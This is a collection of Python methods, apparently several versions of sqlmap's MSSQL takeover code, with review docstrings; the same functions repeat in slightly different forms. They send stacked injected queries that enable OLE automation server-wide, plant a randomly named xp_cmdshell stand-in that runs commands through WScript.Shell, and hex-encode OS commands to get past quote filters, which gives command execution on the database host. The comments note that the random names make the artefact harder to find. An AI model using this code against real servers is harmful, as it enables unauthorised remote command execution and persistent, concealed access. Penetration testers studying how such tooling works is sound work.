    def __xpCmdshellCreate(self):
        """Create a randomly named replacement for xp_cmdshell through OLE automation.

        On MSSQL 2005/2008 the 'Ole Automation Procedures' option is switched on
        first via sp_configure (a server-wide change that nothing in this method
        reverts). A stored procedure master..xp_<random> is then created whose
        body runs its argument through WScript.Shell, and self.xpCmdshellStr is
        pointed at it so later forged commands call the new procedure.

        Side effects: sets self.__randStr, self.__xpCmdshellNew, self.xpCmdshellStr
        and issues up to two stacked queries as the DBMS user.

        NOTE(review): the new procedure is declared with @cmd varchar(255) while
        the forging code elsewhere carries commands in VARCHAR(8000); commands
        longer than 255 characters would presumably be cut by the DBMS before
        reaching WScript.Shell. The procedure text itself is fixed, which is why
        the nvarchar(999) wrapper below is large enough.
        """
        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")

            # sp_OACreate/sp_OAMethod are blocked unless OLE automation is on;
            # both options need a RECONFIGURE to take effect.
            enableOle = ";".join((
                "EXEC master..sp_configure 'show advanced options',1",
                "RECONFIGURE WITH OVERRIDE",
                "EXEC master..sp_configure 'ole automation procedures',1",
                "RECONFIGURE WITH OVERRIDE",
            ))
            inject.goStacked(agent.runAsDBMSUser(enableOle))

        self.__randStr = randomStr(lowercase=True)
        self.__xpCmdshellNew = randomStr(lowercase=True)
        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew

        # Body of the stand-in procedure. Single quotes are doubled because the
        # whole definition is embedded in a T-SQL string literal and executed
        # through sp_executesql.
        procedureText = (
            "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int "
            "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
            "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
            "EXEC sp_OADestroy @ID"
        ) % self.__xpCmdshellNew

        createCmd = "DECLARE @%s nvarchar(999);set @%s='%s';EXEC master..sp_executesql @%s" % (
            self.__randStr, self.__randStr, procedureText, self.__randStr)

        if Backend.isVersionWithin(("2005", "2008")):
            createCmd += ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(createCmd))
    def __xpCmdshellConfigure(self, mode):
        """Build and run the version-specific xp_cmdshell configuration statement.

        `mode` is passed through untouched to either the 2005 builder (MSSQL
        2005/2008) or the 2000 builder (anything else); the statement returned
        is executed as the DBMS user via a stacked query. What the builders
        emit is not visible here — presumably an sp_configure toggle, which
        would be a server-wide setting the caller has to restore.
        """
        modern = Backend.isVersionWithin(("2005", "2008"))
        build = self.__xpCmdshellConfigure2005 if modern else self.__xpCmdshellConfigure2000

        inject.goStacked(agent.runAsDBMSUser(build(mode)))
    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
        """Wrap an OS command in the T-SQL that runs it through the xp_cmdshell stand-in.

        Args:
            cmd: OS command line to execute on the DBMS host.
            insertIntoTable: optional support table that should receive the
                command's output rows. It is spliced into the statement as a
                bare identifier (no quoting), so it must be a trusted name
                generated by sqlmap itself, never user input.

        Returns:
            Whatever agent.runAsDBMSUser() makes of the forged statement; the
            caller is responsible for sending it.

        Side effects: sets self.tmpFile on the --dbms-cred path, and always
        sets self.__randStr, self.__cmd and self.__forgedCmd.

        NOTE(review): the command travels as a 0x-hex literal, so it needs no
        quoting on the SQL side, but it is assigned to a VARCHAR(8000); nothing
        here checks the length, so a longer command would presumably be cut by
        the DBMS. On the --dbms-cred path only stdout is redirected (`>`);
        stderr is not captured.
        """
        wantsOutput = bool(insertIntoTable)

        if conf.dbmsCred and wantsOutput:
            # With --dbms-cred the support table cannot be filled directly (see
            # below), so stdout is sent to a temporary file on the host that is
            # fetched afterwards. The later 'del' of that file is forged with
            # insertIntoTable=None and therefore is not redirected itself.
            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
            cmd = '%s > "%s"' % (cmd, self.tmpFile)

        self.__randStr = randomStr(lowercase=True)
        # Hex literal: no single quotes at all, which also sidesteps
        # quote-filtering on the injection point.
        self.__cmd = "0x%s" % hexencode(cmd)

        pieces = [
            "DECLARE @%s VARCHAR(8000);" % self.__randStr,
            "SET @%s=%s;" % (self.__randStr, self.__cmd),
        ]

        if wantsOutput and not conf.dbmsCred:
            # Capture the output rows straight into the support table (normally
            # 'sqlmapoutput'). Skipped for --dbms-cred: through OPENROWSET the
            # capture would need BULK INSERT, hence the file redirect above.
            pieces.append("INSERT INTO %s " % insertIntoTable)

        pieces.append("EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr))
        self.__forgedCmd = "".join(pieces)

        return agent.runAsDBMSUser(self.__forgedCmd)
    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
        """Forge the T-SQL that executes `cmd` via the current xp_cmdshell procedure.

        Args:
            cmd: OS command line to run on the DBMS host.
            insertIntoTable: optional support table whose `data` column should
                receive the command output. Interpolated unquoted, so it has to
                be an identifier sqlmap produced itself.

        Returns:
            The statement after agent.runAsDBMSUser(); nothing is sent here.

        Side effects: may set self.tmpFile; always sets self._randStr,
        self._cmd and self._forgedCmd.

        NOTE(review): the command is hex-encoded into a VARCHAR(8000) variable
        with no length check, so longer commands would presumably be cut by the
        DBMS. The --dbms-cred redirect uses a plain `>`, i.e. stdout only.
        """
        redirectToFile = bool(conf.dbmsCred) and bool(insertIntoTable)

        if redirectToFile:
            # Output cannot go into the support table when DBMS credentials are
            # used, so stdout is parked in a temporary file that is collected
            # later. The cleanup 'del' is forged without insertIntoTable and so
            # is not redirected.
            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
            cmd = '%s > "%s"' % (cmd, self.tmpFile)

        self._randStr = randomStr(lowercase=True)
        # 0x-literal form carries the command without any single quotes,
        # which also helps against quote filters at the injection point.
        self._cmd = "0x%s" % hexencode(cmd)

        # Fill the support table ('sqlmapoutput' by default) directly unless
        # credentials are in use: the OPENROWSET route would need BULK INSERT,
        # which is why the file redirect above exists instead.
        capture = "INSERT INTO %s(data) " % insertIntoTable if (insertIntoTable and not conf.dbmsCred) else ""

        self._forgedCmd = "DECLARE @%s VARCHAR(8000);SET @%s=%s;%sEXEC %s @%s" % (
            self._randStr, self._randStr, self._cmd, capture, self.xpCmdshellStr, self._randStr)

        return agent.runAsDBMSUser(self._forgedCmd)
    def _xpCmdshellConfigure(self, mode):
        """Run the xp_cmdshell configuration statement for the fingerprinted version.

        MSSQL 2000 gets the 2000 builder; every other version falls through to
        the 2005 builder. `mode` is forwarded unchanged and the resulting
        statement is executed as the DBMS user through a stacked query. The
        builders are not visible here; presumably they toggle a server-wide
        sp_configure option, which the caller would then need to restore.
        """
        legacy = Backend.isVersionWithin(("2000", ))
        build = self._xpCmdshellConfigure2000 if legacy else self._xpCmdshellConfigure2005

        inject.goStacked(agent.runAsDBMSUser(build(mode)))
    def xpCmdshellForgeCmd(self, cmd):
        """Return the forged T-SQL that passes `cmd` to the current xp_cmdshell procedure.

        The command is embedded as a 0x-hex literal (no quotes needed at the
        injection point) in a randomly named VARCHAR(8000) variable and handed
        to self.xpCmdshellStr. Sets self.__randStr, self.__cmd and
        self.__forgedCmd as a side effect; nothing is executed here.

        NOTE(review): no length check — a command longer than 8000 bytes would
        presumably be cut by the DBMS when assigned to the variable.
        """
        var = randomStr(lowercase=True)
        self.__randStr = var
        self.__cmd = "0x%s" % hexencode(cmd)

        self.__forgedCmd = "".join((
            "DECLARE @%s VARCHAR(8000);" % var,
            "SET @%s=%s;" % (var, self.__cmd),
            "EXEC %s @%s" % (self.xpCmdshellStr, var),
        ))

        return agent.runAsDBMSUser(self.__forgedCmd)
    def _xpCmdshellCreate(self):
        """Create the replacement xp_cmdshell procedure from the bundled SQL snippets.

        For any version other than MSSQL 2000 the 'activate_sp_oacreate' snippet
        is run first (a server-wide configuration change this method never
        reverts), then 'create_new_xp_cmdshell' is executed with a random
        variable name and, again for non-2000 servers, a trailing RECONFIGURE.
        self.xpCmdshellStr is pointed at the new procedure for later calls.

        NOTE(review): the procedure name 'master..new_xp_cmdshell' is a fixed
        string here, unlike the randomised names used elsewhere in this file;
        a constant name like that is trivial to search for on the target.
        """
        legacy = Backend.isVersionWithin(("2000",))

        if not legacy:
            logger.debug("activating sp_OACreate")
            activate = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
            inject.goStacked(agent.runAsDBMSUser(activate))

        self._randStr = randomStr(lowercase=True)
        self.xpCmdshellStr = "master..new_xp_cmdshell"

        create = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)

        if not Backend.isVersionWithin(("2000",)):
            create = create + ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(create))
    def xpCmdshellForgeCmd(self, cmd):
        """Build the T-SQL statement that runs `cmd` through self.xpCmdshellStr.

        `cmd` is hex-encoded into a 0x literal so the statement contains no
        quotes, stored in a randomly named VARCHAR(8000) and passed to the
        procedure. Sets self.__randStr, self.__cmd and self.__forgedCmd; the
        statement is returned via agent.runAsDBMSUser(), not executed.

        NOTE(review): the VARCHAR(8000) cap is not checked here; longer
        commands would presumably be cut by the DBMS on assignment.
        """
        var = randomStr(lowercase=True)
        self.__randStr = var
        self.__cmd = "0x%s" % hexencode(cmd)

        self.__forgedCmd = "DECLARE @{0} VARCHAR(8000);SET @{0}={1};EXEC {2} @{0}".format(
            var, self.__cmd, self.xpCmdshellStr)

        return agent.runAsDBMSUser(self.__forgedCmd)
    def __xpCmdshellCreate(self):
        """Create a randomly named xp_cmdshell replacement from the bundled snippets.

        On MSSQL 2005/2008 the 'activate_sp_oacreate' snippet is executed first
        (server-wide setting; not reverted by this method). Then
        'create_new_xp_cmdshell' is rendered with a random variable name and a
        random procedure name xp_<random>, suffixed with a RECONFIGURE on
        2005/2008, and executed. self.xpCmdshellStr is updated so subsequent
        forged commands target the new procedure.

        Side effects: sets self.__randStr, self.__xpCmdshellNew,
        self.xpCmdshellStr; issues one or two stacked queries as the DBMS user.
        """
        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")
            inject.goStacked(agent.runAsDBMSUser(getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")))

        self.__randStr = randomStr(lowercase=True)
        # Random procedure name so the artefact left on the server is not a
        # constant string.
        self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
        self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew

        statement = getSQLSnippet(
            DBMS.MSSQL,
            "create_new_xp_cmdshell",
            RANDSTR=self.__randStr,
            XP_CMDSHELL_NEW=self.__xpCmdshellNew,
        )

        if Backend.isVersionWithin(("2005", "2008")):
            statement = statement + ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(statement))
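    def _xpCmdshellCreate(self):
        """Create a randomly named xp_cmdshell replacement from the bundled snippets.

        For MSSQL 2005/2008/2012 the 'activate_sp_oacreate' snippet is executed
        first (a server-wide configuration change this method does not revert).
        Then 'create_new_xp_cmdshell' is rendered with a random variable name and
        a random procedure name xp_<random> and executed, followed by a
        RECONFIGURE on the same set of versions. self.xpCmdshellStr is pointed
        at the new procedure for later forged commands.

        Side effects: sets self._randStr, self._xpCmdshellNew, self.xpCmdshellStr;
        issues one or two stacked queries as the DBMS user.
        """
        # Evaluate the version test once and use it for both steps. Previously
        # the activation ran for 2012 while the trailing RECONFIGURE was only
        # appended for 2005/2008, so the two halves disagreed on 2012; the
        # sibling implementation guards both with one condition.
        needsOleAutomation = Backend.isVersionWithin(("2005", "2008", "2012"))

        if needsOleAutomation:
            logger.debug("activating sp_OACreate")
            inject.goStacked(agent.runAsDBMSUser(getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")))

        self._randStr = randomStr(lowercase=True)
        # Random procedure name so the artefact left on the server is not a
        # constant, easily searchable string.
        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew

        cmd = getSQLSnippet(
            DBMS.MSSQL,
            "create_new_xp_cmdshell",
            RANDSTR=self._randStr,
            XP_CMDSHELL_NEW=self._xpCmdshellNew,
        )

        if needsOleAutomation:
            cmd += ";RECONFIGURE WITH OVERRIDE"

        inject.goStacked(agent.runAsDBMSUser(cmd))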